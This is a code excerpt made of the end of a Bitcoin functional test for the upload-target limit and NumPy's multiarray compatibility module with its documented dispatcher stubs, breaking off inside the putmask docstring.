test_nodes[0].send_message(getdata_request)
test_nodes[0].sync_with_ping()
assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)
assert_equal(len(self.nodes[0].getpeerinfo()), 3)
# At most a couple more tries should succeed (depending on how long
# the test has been running so far).
for i in xrange(3):
test_nodes[0].send_message(getdata_request)
test_nodes[0].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 2)
print "Peer 0 disconnected after downloading old block too many times"
# Requesting the current block on test_nodes[1] should succeed indefinitely,
# even when over the max upload target.
# We'll try 200 times
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(200):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
print "Peer 1 able to repeatedly download new block"
# But if test_nodes[1] tries for an old block, it gets disconnected too.
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 1)
print "Peer 1 disconnected after trying to download old block"
print "Advancing system time on node to clear counters..."
# If we advance the time by 24 hours, then the counters should reset,
# and test_nodes[2] should be able to retrieve the old block.
self.nodes[0].setmocktime(int(time.time()))
test_nodes[2].sync_with_ping()
test_nodes[2].send_message(getdata_request)
test_nodes[2].sync_with_ping()
assert_equal(test_nodes[2].block_receive_map[big_old_block], 1)
print "Peer 2 able to download old block"
[c.disconnect_node() for c in connections]
#stop and start node 0 with 1MB maxuploadtarget, whitelist 127.0.0.1
print "Restarting nodes with -whitelist=127.0.0.1"
stop_node(self.nodes[0], 0)
self.nodes[0] = start_node(0, self.options.tmpdir, ["-debug", "-whitelist=127.0.0.1", "-maxuploadtarget=1", "-blockmaxsize=999000"])
#recreate/reconnect 3 test nodes
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
#retrieve 20 blocks which should be enough to break the 1MB limit
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(20):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1)
getdata_request.inv = [CInv(2, big_old_block)]
test_nodes[1].send_message(getdata_request)
test_nodes[1].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 3) #node is still connected because of the whitelist
print "Peer 1 still connected after trying to download old block (whitelisted)"
[c.disconnect_node() for c in connections]
if __name__ == '__main__':
MaxUploadTest().main()
|
py | 1a37ed3e143e86d7ff47235d15c2d369090d8036 | """
Create the numpy.core.multiarray namespace for backward compatibility. In v1.16
the multiarray and umath c-extension modules were merged into a single
_multiarray_umath extension module. So we replicate the old namespace
by importing from the extension module.
"""
import functools
from . import overrides
from . import _multiarray_umath
from ._multiarray_umath import * # noqa: F403
# These imports are needed for backward compatibility,
# do not change them. issue gh-15518
# _get_ndarray_c_version is semi-public, on purpose not added to __all__
from ._multiarray_umath import (
_fastCopyAndTranspose, _flagdict, from_dlpack, _insert, _reconstruct,
_vec_string, _ARRAY_API, _monotonicity, _get_ndarray_c_version,
_set_madvise_hugepage,
)
__all__ = [
'_ARRAY_API', 'ALLOW_THREADS', 'BUFSIZE', 'CLIP', 'DATETIMEUNITS',
'ITEM_HASOBJECT', 'ITEM_IS_POINTER', 'LIST_PICKLE', 'MAXDIMS',
'MAY_SHARE_BOUNDS', 'MAY_SHARE_EXACT', 'NEEDS_INIT', 'NEEDS_PYAPI',
'RAISE', 'USE_GETITEM', 'USE_SETITEM', 'WRAP', '_fastCopyAndTranspose',
'_flagdict', 'from_dlpack', '_insert', '_reconstruct', '_vec_string',
'_monotonicity', 'add_docstring', 'arange', 'array', 'asarray',
'asanyarray', 'ascontiguousarray', 'asfortranarray', 'bincount',
'broadcast', 'busday_count', 'busday_offset', 'busdaycalendar', 'can_cast',
'compare_chararrays', 'concatenate', 'copyto', 'correlate', 'correlate2',
'count_nonzero', 'c_einsum', 'datetime_as_string', 'datetime_data',
'dot', 'dragon4_positional', 'dragon4_scientific', 'dtype',
'empty', 'empty_like', 'error', 'flagsobj', 'flatiter', 'format_longfloat',
'frombuffer', 'fromfile', 'fromiter', 'fromstring',
'get_handler_name', 'get_handler_version', 'inner', 'interp',
'interp_complex', 'is_busday', 'lexsort', 'matmul', 'may_share_memory',
'min_scalar_type', 'ndarray', 'nditer', 'nested_iters',
'normalize_axis_index', 'packbits', 'promote_types', 'putmask',
'ravel_multi_index', 'result_type', 'scalar', 'set_datetimeparse_function',
'set_legacy_print_mode', 'set_numeric_ops', 'set_string_function',
'set_typeDict', 'shares_memory', 'tracemalloc_domain', 'typeinfo',
'unpackbits', 'unravel_index', 'vdot', 'where', 'zeros']
# For backward compatibility, make sure pickle imports these functions from here
_reconstruct.__module__ = 'numpy.core.multiarray'
scalar.__module__ = 'numpy.core.multiarray'
from_dlpack.__module__ = 'numpy'
arange.__module__ = 'numpy'
array.__module__ = 'numpy'
asarray.__module__ = 'numpy'
asanyarray.__module__ = 'numpy'
ascontiguousarray.__module__ = 'numpy'
asfortranarray.__module__ = 'numpy'
datetime_data.__module__ = 'numpy'
empty.__module__ = 'numpy'
frombuffer.__module__ = 'numpy'
fromfile.__module__ = 'numpy'
fromiter.__module__ = 'numpy'
frompyfunc.__module__ = 'numpy'
fromstring.__module__ = 'numpy'
geterrobj.__module__ = 'numpy'
may_share_memory.__module__ = 'numpy'
nested_iters.__module__ = 'numpy'
promote_types.__module__ = 'numpy'
set_numeric_ops.__module__ = 'numpy'
seterrobj.__module__ = 'numpy'
zeros.__module__ = 'numpy'
# We can't verify dispatcher signatures because NumPy's C functions don't
# support introspection.
array_function_from_c_func_and_dispatcher = functools.partial(
overrides.array_function_from_dispatcher,
module='numpy', docs_from_dispatcher=True, verify=False)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.empty_like)
def empty_like(prototype, dtype=None, order=None, subok=None, shape=None):
"""
empty_like(prototype, dtype=None, order='K', subok=True, shape=None)
Return a new array with the same shape and type as a given array.
Parameters
----------
prototype : array_like
The shape and data-type of `prototype` define these same attributes
of the returned array.
dtype : data-type, optional
Overrides the data type of the result.
.. versionadded:: 1.6.0
order : {'C', 'F', 'A', or 'K'}, optional
Overrides the memory layout of the result. 'C' means C-order,
'F' means F-order, 'A' means 'F' if `prototype` is Fortran
contiguous, 'C' otherwise. 'K' means match the layout of `prototype`
as closely as possible.
.. versionadded:: 1.6.0
subok : bool, optional.
If True, then the newly created array will use the sub-class
type of `prototype`, otherwise it will be a base-class array. Defaults
to True.
shape : int or sequence of ints, optional.
Overrides the shape of the result. If order='K' and the number of
dimensions is unchanged, will try to keep order, otherwise,
order='C' is implied.
.. versionadded:: 1.17.0
Returns
-------
out : ndarray
Array of uninitialized (arbitrary) data with the same
shape and type as `prototype`.
See Also
--------
ones_like : Return an array of ones with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full_like : Return a new array with shape of input filled with value.
empty : Return a new uninitialized array.
Notes
-----
This function does *not* initialize the returned array; to do that use
`zeros_like` or `ones_like` instead. It may be marginally faster than
the functions that do set the array values.
Examples
--------
>>> a = ([1,2,3], [4,5,6]) # a is array-like
>>> np.empty_like(a)
array([[-1073741821, -1073741821, 3], # uninitialized
[ 0, 0, -1073741821]])
>>> a = np.array([[1., 2., 3.],[4.,5.,6.]])
>>> np.empty_like(a)
array([[ -2.00000715e+000, 1.48219694e-323, -2.00000572e+000], # uninitialized
[ 4.38791518e-305, -2.00000715e+000, 4.17269252e-309]])
"""
return (prototype,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.concatenate)
def concatenate(arrays, axis=None, out=None, *, dtype=None, casting=None):
"""
concatenate((a1, a2, ...), axis=0, out=None, dtype=None, casting="same_kind")
Join a sequence of arrays along an existing axis.
Parameters
----------
a1, a2, ... : sequence of array_like
The arrays must have the same shape, except in the dimension
corresponding to `axis` (the first, by default).
axis : int, optional
The axis along which the arrays will be joined. If axis is None,
arrays are flattened before use. Default is 0.
out : ndarray, optional
If provided, the destination to place the result. The shape must be
correct, matching that of what concatenate would have returned if no
out argument were specified.
dtype : str or dtype
If provided, the destination array will have this dtype. Cannot be
provided together with `out`.
.. versionadded:: 1.20.0
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur. Defaults to 'same_kind'.
.. versionadded:: 1.20.0
Returns
-------
res : ndarray
The concatenated array.
See Also
--------
ma.concatenate : Concatenate function that preserves input masks.
array_split : Split an array into multiple sub-arrays of equal or
near-equal size.
split : Split array into a list of multiple sub-arrays of equal size.
hsplit : Split array into multiple sub-arrays horizontally (column wise).
vsplit : Split array into multiple sub-arrays vertically (row wise).
dsplit : Split array into multiple sub-arrays along the 3rd axis (depth).
stack : Stack a sequence of arrays along a new axis.
block : Assemble arrays from blocks.
hstack : Stack arrays in sequence horizontally (column wise).
vstack : Stack arrays in sequence vertically (row wise).
dstack : Stack arrays in sequence depth wise (along third dimension).
column_stack : Stack 1-D arrays as columns into a 2-D array.
Notes
-----
When one or more of the arrays to be concatenated is a MaskedArray,
this function will return a MaskedArray object instead of an ndarray,
but the input masks are *not* preserved. In cases where a MaskedArray
is expected as input, use the ma.concatenate function from the masked
array module instead.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> b = np.array([[5, 6]])
>>> np.concatenate((a, b), axis=0)
array([[1, 2],
[3, 4],
[5, 6]])
>>> np.concatenate((a, b.T), axis=1)
array([[1, 2, 5],
[3, 4, 6]])
>>> np.concatenate((a, b), axis=None)
array([1, 2, 3, 4, 5, 6])
This function will not preserve masking of MaskedArray inputs.
>>> a = np.ma.arange(3)
>>> a[1] = np.ma.masked
>>> b = np.arange(2, 5)
>>> a
masked_array(data=[0, --, 2],
mask=[False, True, False],
fill_value=999999)
>>> b
array([2, 3, 4])
>>> np.concatenate([a, b])
masked_array(data=[0, 1, 2, 2, 3, 4],
mask=False,
fill_value=999999)
>>> np.ma.concatenate([a, b])
masked_array(data=[0, --, 2, 2, 3, 4],
mask=[False, True, False, False, False, False],
fill_value=999999)
"""
if out is not None:
# optimize for the typical case where only arrays is provided
arrays = list(arrays)
arrays.append(out)
return arrays
@array_function_from_c_func_and_dispatcher(_multiarray_umath.inner)
def inner(a, b):
"""
inner(a, b, /)
Inner product of two arrays.
Ordinary inner product of vectors for 1-D arrays (without complex
conjugation), in higher dimensions a sum product over the last axes.
Parameters
----------
a, b : array_like
If `a` and `b` are nonscalar, their last dimensions must match.
Returns
-------
out : ndarray
If `a` and `b` are both
scalars or both 1-D arrays then a scalar is returned; otherwise
an array is returned.
``out.shape = (*a.shape[:-1], *b.shape[:-1])``
Raises
------
ValueError
If both `a` and `b` are nonscalar and their last dimensions have
different sizes.
See Also
--------
tensordot : Sum products over arbitrary axes.
dot : Generalised matrix product, using second last dimension of `b`.
einsum : Einstein summation convention.
Notes
-----
For vectors (1-D arrays) it computes the ordinary inner-product::
np.inner(a, b) = sum(a[:]*b[:])
More generally, if `ndim(a) = r > 0` and `ndim(b) = s > 0`::
np.inner(a, b) = np.tensordot(a, b, axes=(-1,-1))
or explicitly::
np.inner(a, b)[i0,...,ir-2,j0,...,js-2]
= sum(a[i0,...,ir-2,:]*b[j0,...,js-2,:])
In addition `a` or `b` may be scalars, in which case::
np.inner(a,b) = a*b
Examples
--------
Ordinary inner product for vectors:
>>> a = np.array([1,2,3])
>>> b = np.array([0,1,0])
>>> np.inner(a, b)
2
Some multidimensional examples:
>>> a = np.arange(24).reshape((2,3,4))
>>> b = np.arange(4)
>>> c = np.inner(a, b)
>>> c.shape
(2, 3)
>>> c
array([[ 14, 38, 62],
[ 86, 110, 134]])
>>> a = np.arange(2).reshape((1,1,2))
>>> b = np.arange(6).reshape((3,2))
>>> c = np.inner(a, b)
>>> c.shape
(1, 1, 3)
>>> c
array([[[1, 3, 5]]])
An example where `b` is a scalar:
>>> np.inner(np.eye(2), 7)
array([[7., 0.],
[0., 7.]])
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.where)
def where(condition, x=None, y=None):
"""
where(condition, [x, y], /)
Return elements chosen from `x` or `y` depending on `condition`.
.. note::
When only `condition` is provided, this function is a shorthand for
``np.asarray(condition).nonzero()``. Using `nonzero` directly should be
preferred, as it behaves correctly for subclasses. The rest of this
documentation covers only the case where all three arguments are
provided.
Parameters
----------
condition : array_like, bool
Where True, yield `x`, otherwise yield `y`.
x, y : array_like
Values from which to choose. `x`, `y` and `condition` need to be
broadcastable to some shape.
Returns
-------
out : ndarray
An array with elements from `x` where `condition` is True, and elements
from `y` elsewhere.
See Also
--------
choose
nonzero : The function that is called when x and y are omitted
Notes
-----
If all the arrays are 1-D, `where` is equivalent to::
[xv if c else yv
for c, xv, yv in zip(condition, x, y)]
Examples
--------
>>> a = np.arange(10)
>>> a
array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
>>> np.where(a < 5, a, 10*a)
array([ 0, 1, 2, 3, 4, 50, 60, 70, 80, 90])
This can be used on multidimensional arrays too:
>>> np.where([[True, False], [True, True]],
... [[1, 2], [3, 4]],
... [[9, 8], [7, 6]])
array([[1, 8],
[3, 4]])
The shapes of x, y, and the condition are broadcast together:
>>> x, y = np.ogrid[:3, :4]
>>> np.where(x < y, x, 10 + y) # both x and 10+y are broadcast
array([[10, 0, 0, 0],
[10, 11, 1, 1],
[10, 11, 12, 2]])
>>> a = np.array([[0, 1, 2],
... [0, 2, 4],
... [0, 3, 6]])
>>> np.where(a < 4, a, -1) # -1 is broadcast
array([[ 0, 1, 2],
[ 0, 2, -1],
[ 0, 3, -1]])
"""
return (condition, x, y)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.lexsort)
def lexsort(keys, axis=None):
"""
lexsort(keys, axis=-1)
Perform an indirect stable sort using a sequence of keys.
Given multiple sorting keys, which can be interpreted as columns in a
spreadsheet, lexsort returns an array of integer indices that describes
the sort order by multiple columns. The last key in the sequence is used
for the primary sort order, the second-to-last key for the secondary sort
order, and so on. The keys argument must be a sequence of objects that
can be converted to arrays of the same shape. If a 2D array is provided
for the keys argument, its rows are interpreted as the sorting keys and
sorting is according to the last row, second last row etc.
Parameters
----------
keys : (k, N) array or tuple containing k (N,)-shaped sequences
The `k` different "columns" to be sorted. The last column (or row if
`keys` is a 2D array) is the primary sort key.
axis : int, optional
Axis to be indirectly sorted. By default, sort over the last axis.
Returns
-------
indices : (N,) ndarray of ints
Array of indices that sort the keys along the specified axis.
See Also
--------
argsort : Indirect sort.
ndarray.sort : In-place sort.
sort : Return a sorted copy of an array.
Examples
--------
Sort names: first by surname, then by name.
>>> surnames = ('Hertz', 'Galilei', 'Hertz')
>>> first_names = ('Heinrich', 'Galileo', 'Gustav')
>>> ind = np.lexsort((first_names, surnames))
>>> ind
array([1, 2, 0])
>>> [surnames[i] + ", " + first_names[i] for i in ind]
['Galilei, Galileo', 'Hertz, Gustav', 'Hertz, Heinrich']
Sort two columns of numbers:
>>> a = [1,5,1,4,3,4,4] # First column
>>> b = [9,4,0,4,0,2,1] # Second column
>>> ind = np.lexsort((b,a)) # Sort by a, then by b
>>> ind
array([2, 0, 4, 6, 5, 3, 1])
>>> [(a[i],b[i]) for i in ind]
[(1, 0), (1, 9), (3, 0), (4, 1), (4, 2), (4, 4), (5, 4)]
Note that sorting is first according to the elements of ``a``.
Secondary sorting is according to the elements of ``b``.
A normal ``argsort`` would have yielded:
>>> [(a[i],b[i]) for i in np.argsort(a)]
[(1, 9), (1, 0), (3, 0), (4, 4), (4, 2), (4, 1), (5, 4)]
Structured arrays are sorted lexically by ``argsort``:
>>> x = np.array([(1,9), (5,4), (1,0), (4,4), (3,0), (4,2), (4,1)],
... dtype=np.dtype([('x', int), ('y', int)]))
>>> np.argsort(x) # or np.argsort(x, order=('x', 'y'))
array([2, 0, 4, 6, 5, 3, 1])
"""
if isinstance(keys, tuple):
return keys
else:
return (keys,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.can_cast)
def can_cast(from_, to, casting=None):
"""
can_cast(from_, to, casting='safe')
Returns True if cast between data types can occur according to the
casting rule. If from is a scalar or array scalar, also returns
True if the scalar value can be cast without overflow or truncation
to an integer.
Parameters
----------
from_ : dtype, dtype specifier, scalar, or array
Data type, scalar, or array to cast from.
to : dtype or dtype specifier
Data type to cast to.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur.
* 'no' means the data types should not be cast at all.
* 'equiv' means only byte-order changes are allowed.
* 'safe' means only casts which can preserve values are allowed.
* 'same_kind' means only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe' means any data conversions may be done.
Returns
-------
out : bool
True if cast can occur according to the casting rule.
Notes
-----
.. versionchanged:: 1.17.0
Casting between a simple data type and a structured one is possible only
for "unsafe" casting. Casting to multiple fields is allowed, but
casting from multiple fields is not.
.. versionchanged:: 1.9.0
Casting from numeric to string types in 'safe' casting mode requires
that the string dtype length is long enough to store the maximum
integer/float value converted.
See also
--------
dtype, result_type
Examples
--------
Basic examples
>>> np.can_cast(np.int32, np.int64)
True
>>> np.can_cast(np.float64, complex)
True
>>> np.can_cast(complex, float)
False
>>> np.can_cast('i8', 'f8')
True
>>> np.can_cast('i8', 'f4')
False
>>> np.can_cast('i4', 'S4')
False
Casting scalars
>>> np.can_cast(100, 'i1')
True
>>> np.can_cast(150, 'i1')
False
>>> np.can_cast(150, 'u1')
True
>>> np.can_cast(3.5e100, np.float32)
False
>>> np.can_cast(1000.0, np.float32)
True
Array scalar checks the value, array does not
>>> np.can_cast(np.array(1000.0), np.float32)
True
>>> np.can_cast(np.array([1000.0]), np.float32)
False
Using the casting rules
>>> np.can_cast('i8', 'i8', 'no')
True
>>> np.can_cast('<i8', '>i8', 'no')
False
>>> np.can_cast('<i8', '>i8', 'equiv')
True
>>> np.can_cast('<i4', '>i8', 'equiv')
False
>>> np.can_cast('<i4', '>i8', 'safe')
True
>>> np.can_cast('<i8', '>i4', 'safe')
False
>>> np.can_cast('<i8', '>i4', 'same_kind')
True
>>> np.can_cast('<i8', '>u4', 'same_kind')
False
>>> np.can_cast('<i8', '>u4', 'unsafe')
True
"""
return (from_,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.min_scalar_type)
def min_scalar_type(a):
"""
min_scalar_type(a, /)
For scalar ``a``, returns the data type with the smallest size
and smallest scalar kind which can hold its value. For non-scalar
array ``a``, returns the vector's dtype unmodified.
Floating point values are not demoted to integers,
and complex values are not demoted to floats.
Parameters
----------
a : scalar or array_like
The value whose minimal data type is to be found.
Returns
-------
out : dtype
The minimal data type.
Notes
-----
.. versionadded:: 1.6.0
See Also
--------
result_type, promote_types, dtype, can_cast
Examples
--------
>>> np.min_scalar_type(10)
dtype('uint8')
>>> np.min_scalar_type(-260)
dtype('int16')
>>> np.min_scalar_type(3.1)
dtype('float16')
>>> np.min_scalar_type(1e50)
dtype('float64')
>>> np.min_scalar_type(np.arange(4,dtype='f8'))
dtype('float64')
"""
return (a,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.result_type)
def result_type(*arrays_and_dtypes):
"""
result_type(*arrays_and_dtypes)
Returns the type that results from applying the NumPy
type promotion rules to the arguments.
Type promotion in NumPy works similarly to the rules in languages
like C++, with some slight differences. When both scalars and
arrays are used, the array's type takes precedence and the actual value
of the scalar is taken into account.
For example, calculating 3*a, where a is an array of 32-bit floats,
intuitively should result in a 32-bit float output. If the 3 is a
32-bit integer, the NumPy rules indicate it can't convert losslessly
into a 32-bit float, so a 64-bit float should be the result type.
By examining the value of the constant, '3', we see that it fits in
an 8-bit integer, which can be cast losslessly into the 32-bit float.
Parameters
----------
arrays_and_dtypes : list of arrays and dtypes
The operands of some operation whose result type is needed.
Returns
-------
out : dtype
The result type.
See also
--------
dtype, promote_types, min_scalar_type, can_cast
Notes
-----
.. versionadded:: 1.6.0
The specific algorithm used is as follows.
Categories are determined by first checking which of boolean,
integer (int/uint), or floating point (float/complex) the maximum
kind of all the arrays and the scalars are.
If there are only scalars or the maximum category of the scalars
is higher than the maximum category of the arrays,
the data types are combined with :func:`promote_types`
to produce the return value.
Otherwise, `min_scalar_type` is called on each array, and
the resulting data types are all combined with :func:`promote_types`
to produce the return value.
The set of int values is not a subset of the uint values for types
with the same number of bits, something not reflected in
:func:`min_scalar_type`, but handled as a special case in `result_type`.
Examples
--------
>>> np.result_type(3, np.arange(7, dtype='i1'))
dtype('int8')
>>> np.result_type('i4', 'c8')
dtype('complex128')
>>> np.result_type(3.0, -2)
dtype('float64')
"""
return arrays_and_dtypes
@array_function_from_c_func_and_dispatcher(_multiarray_umath.dot)
def dot(a, b, out=None):
"""
dot(a, b, out=None)
Dot product of two arrays. Specifically,
- If both `a` and `b` are 1-D arrays, it is inner product of vectors
(without complex conjugation).
- If both `a` and `b` are 2-D arrays, it is matrix multiplication,
but using :func:`matmul` or ``a @ b`` is preferred.
- If either `a` or `b` is 0-D (scalar), it is equivalent to :func:`multiply`
and using ``numpy.multiply(a, b)`` or ``a * b`` is preferred.
- If `a` is an N-D array and `b` is a 1-D array, it is a sum product over
the last axis of `a` and `b`.
- If `a` is an N-D array and `b` is an M-D array (where ``M>=2``), it is a
sum product over the last axis of `a` and the second-to-last axis of `b`::
dot(a, b)[i,j,k,m] = sum(a[i,j,:] * b[k,:,m])
Parameters
----------
a : array_like
First argument.
b : array_like
Second argument.
out : ndarray, optional
Output argument. This must have the exact kind that would be returned
if it was not used. In particular, it must have the right type, must be
C-contiguous, and its dtype must be the dtype that would be returned
for `dot(a,b)`. This is a performance feature. Therefore, if these
conditions are not met, an exception is raised, instead of attempting
to be flexible.
Returns
-------
output : ndarray
Returns the dot product of `a` and `b`. If `a` and `b` are both
scalars or both 1-D arrays then a scalar is returned; otherwise
an array is returned.
If `out` is given, then it is returned.
Raises
------
ValueError
If the last dimension of `a` is not the same size as
the second-to-last dimension of `b`.
See Also
--------
vdot : Complex-conjugating dot product.
tensordot : Sum products over arbitrary axes.
einsum : Einstein summation convention.
matmul : '@' operator as method with out parameter.
linalg.multi_dot : Chained dot product.
Examples
--------
>>> np.dot(3, 4)
12
Neither argument is complex-conjugated:
>>> np.dot([2j, 3j], [2j, 3j])
(-13+0j)
For 2-D arrays it is the matrix product:
>>> a = [[1, 0], [0, 1]]
>>> b = [[4, 1], [2, 2]]
>>> np.dot(a, b)
array([[4, 1],
[2, 2]])
>>> a = np.arange(3*4*5*6).reshape((3,4,5,6))
>>> b = np.arange(3*4*5*6)[::-1].reshape((5,4,6,3))
>>> np.dot(a, b)[2,3,2,1,2,2]
499128
>>> sum(a[2,3,2,:] * b[1,2,:,2])
499128
"""
return (a, b, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.vdot)
def vdot(a, b):
"""
vdot(a, b, /)
Return the dot product of two vectors.
The vdot(`a`, `b`) function handles complex numbers differently than
dot(`a`, `b`). If the first argument is complex the complex conjugate
of the first argument is used for the calculation of the dot product.
Note that `vdot` handles multidimensional arrays differently than `dot`:
it does *not* perform a matrix product, but flattens input arguments
to 1-D vectors first. Consequently, it should only be used for vectors.
Parameters
----------
a : array_like
If `a` is complex the complex conjugate is taken before calculation
of the dot product.
b : array_like
Second argument to the dot product.
Returns
-------
output : ndarray
Dot product of `a` and `b`. Can be an int, float, or
complex depending on the types of `a` and `b`.
See Also
--------
dot : Return the dot product without using the complex conjugate of the
first argument.
Examples
--------
>>> a = np.array([1+2j,3+4j])
>>> b = np.array([5+6j,7+8j])
>>> np.vdot(a, b)
(70-8j)
>>> np.vdot(b, a)
(70+8j)
Note that higher-dimensional arrays are flattened!
>>> a = np.array([[1, 4], [5, 6]])
>>> b = np.array([[4, 1], [2, 2]])
>>> np.vdot(a, b)
30
>>> np.vdot(b, a)
30
>>> 1*4 + 4*1 + 5*2 + 6*2
30
"""
return (a, b)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.bincount)
def bincount(x, weights=None, minlength=None):
"""
bincount(x, /, weights=None, minlength=0)
Count number of occurrences of each value in array of non-negative ints.
The number of bins (of size 1) is one larger than the largest value in
`x`. If `minlength` is specified, there will be at least this number
of bins in the output array (though it will be longer if necessary,
depending on the contents of `x`).
Each bin gives the number of occurrences of its index value in `x`.
If `weights` is specified the input array is weighted by it, i.e. if a
value ``n`` is found at position ``i``, ``out[n] += weight[i]`` instead
of ``out[n] += 1``.
Parameters
----------
x : array_like, 1 dimension, nonnegative ints
Input array.
weights : array_like, optional
Weights, array of the same shape as `x`.
minlength : int, optional
A minimum number of bins for the output array.
.. versionadded:: 1.6.0
Returns
-------
out : ndarray of ints
The result of binning the input array.
The length of `out` is equal to ``np.amax(x)+1``.
Raises
------
ValueError
If the input is not 1-dimensional, or contains elements with negative
values, or if `minlength` is negative.
TypeError
If the type of the input is float or complex.
See Also
--------
histogram, digitize, unique
Examples
--------
>>> np.bincount(np.arange(5))
array([1, 1, 1, 1, 1])
>>> np.bincount(np.array([0, 1, 1, 3, 2, 1, 7]))
array([1, 3, 1, 1, 0, 0, 0, 1])
>>> x = np.array([0, 1, 1, 3, 2, 1, 7, 23])
>>> np.bincount(x).size == np.amax(x)+1
True
The input array needs to be of integer dtype, otherwise a
TypeError is raised:
>>> np.bincount(np.arange(5, dtype=float))
Traceback (most recent call last):
...
TypeError: Cannot cast array data from dtype('float64') to dtype('int64')
according to the rule 'safe'
A possible use of ``bincount`` is to perform sums over
variable-size chunks of an array, using the ``weights`` keyword.
>>> w = np.array([0.3, 0.5, 0.2, 0.7, 1., -0.6]) # weights
>>> x = np.array([0, 1, 1, 2, 2, 2])
>>> np.bincount(x, weights=w)
array([ 0.3, 0.7, 1.1])
"""
return (x, weights)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.ravel_multi_index)
def ravel_multi_index(multi_index, dims, mode=None, order=None):
"""
ravel_multi_index(multi_index, dims, mode='raise', order='C')
Converts a tuple of index arrays into an array of flat
indices, applying boundary modes to the multi-index.
Parameters
----------
multi_index : tuple of array_like
A tuple of integer arrays, one array for each dimension.
dims : tuple of ints
The shape of array into which the indices from ``multi_index`` apply.
mode : {'raise', 'wrap', 'clip'}, optional
Specifies how out-of-bounds indices are handled. Can specify
either one mode or a tuple of modes, one mode per index.
* 'raise' -- raise an error (default)
* 'wrap' -- wrap around
* 'clip' -- clip to the range
In 'clip' mode, a negative index which would normally
wrap will clip to 0 instead.
order : {'C', 'F'}, optional
Determines whether the multi-index should be viewed as
indexing in row-major (C-style) or column-major
(Fortran-style) order.
Returns
-------
raveled_indices : ndarray
An array of indices into the flattened version of an array
of dimensions ``dims``.
See Also
--------
unravel_index
Notes
-----
.. versionadded:: 1.6.0
Examples
--------
>>> arr = np.array([[3,6,6],[4,5,1]])
>>> np.ravel_multi_index(arr, (7,6))
array([22, 41, 37])
>>> np.ravel_multi_index(arr, (7,6), order='F')
array([31, 41, 13])
>>> np.ravel_multi_index(arr, (4,6), mode='clip')
array([22, 23, 19])
>>> np.ravel_multi_index(arr, (4,4), mode=('clip','wrap'))
array([12, 13, 13])
>>> np.ravel_multi_index((3,1,4,1), (6,7,8,9))
1621
"""
return multi_index
@array_function_from_c_func_and_dispatcher(_multiarray_umath.unravel_index)
def unravel_index(indices, shape=None, order=None):
"""
unravel_index(indices, shape, order='C')
Converts a flat index or array of flat indices into a tuple
of coordinate arrays.
Parameters
----------
indices : array_like
An integer array whose elements are indices into the flattened
version of an array of dimensions ``shape``. Before version 1.6.0,
this function accepted just one index value.
shape : tuple of ints
The shape of the array to use for unraveling ``indices``.
.. versionchanged:: 1.16.0
Renamed from ``dims`` to ``shape``.
order : {'C', 'F'}, optional
Determines whether the indices should be viewed as indexing in
row-major (C-style) or column-major (Fortran-style) order.
.. versionadded:: 1.6.0
Returns
-------
unraveled_coords : tuple of ndarray
Each array in the tuple has the same shape as the ``indices``
array.
See Also
--------
ravel_multi_index
Examples
--------
>>> np.unravel_index([22, 41, 37], (7,6))
(array([3, 6, 6]), array([4, 5, 1]))
>>> np.unravel_index([31, 41, 13], (7,6), order='F')
(array([3, 6, 6]), array([4, 5, 1]))
>>> np.unravel_index(1621, (6,7,8,9))
(3, 1, 4, 1)
"""
return (indices,)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.copyto)
def copyto(dst, src, casting=None, where=None):
"""
copyto(dst, src, casting='same_kind', where=True)
Copies values from one array to another, broadcasting as necessary.
Raises a TypeError if the `casting` rule is violated, and if
`where` is provided, it selects which elements to copy.
.. versionadded:: 1.7.0
Parameters
----------
dst : ndarray
The array into which values are copied.
src : array_like
The array from which values are copied.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}, optional
Controls what kind of data casting may occur when copying.
* 'no' means the data types should not be cast at all.
* 'equiv' means only byte-order changes are allowed.
* 'safe' means only casts which can preserve values are allowed.
* 'same_kind' means only safe casts or casts within a kind,
like float64 to float32, are allowed.
* 'unsafe' means any data conversions may be done.
where : array_like of bool, optional
A boolean array which is broadcasted to match the dimensions
of `dst`, and selects elements to copy from `src` to `dst`
wherever it contains the value True.
"""
return (dst, src, where)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.putmask)
def putmask(a, mask, values):
"""
putmask(a, mask, values)
Changes elements of an array based on conditional and input values.
Sets ``a.flat[n] = values[n]`` for each n where ``mask.flat[n]==True``.
If `values` is not the same size as `a` and `mask` then it will repeat.
This gives behavior different from ``a[mask] = values``.
Parameters
----------
a : ndarray
Target array.
mask : array_like
Boolean mask array. It has to be the same shape as `a`.
values : array_like
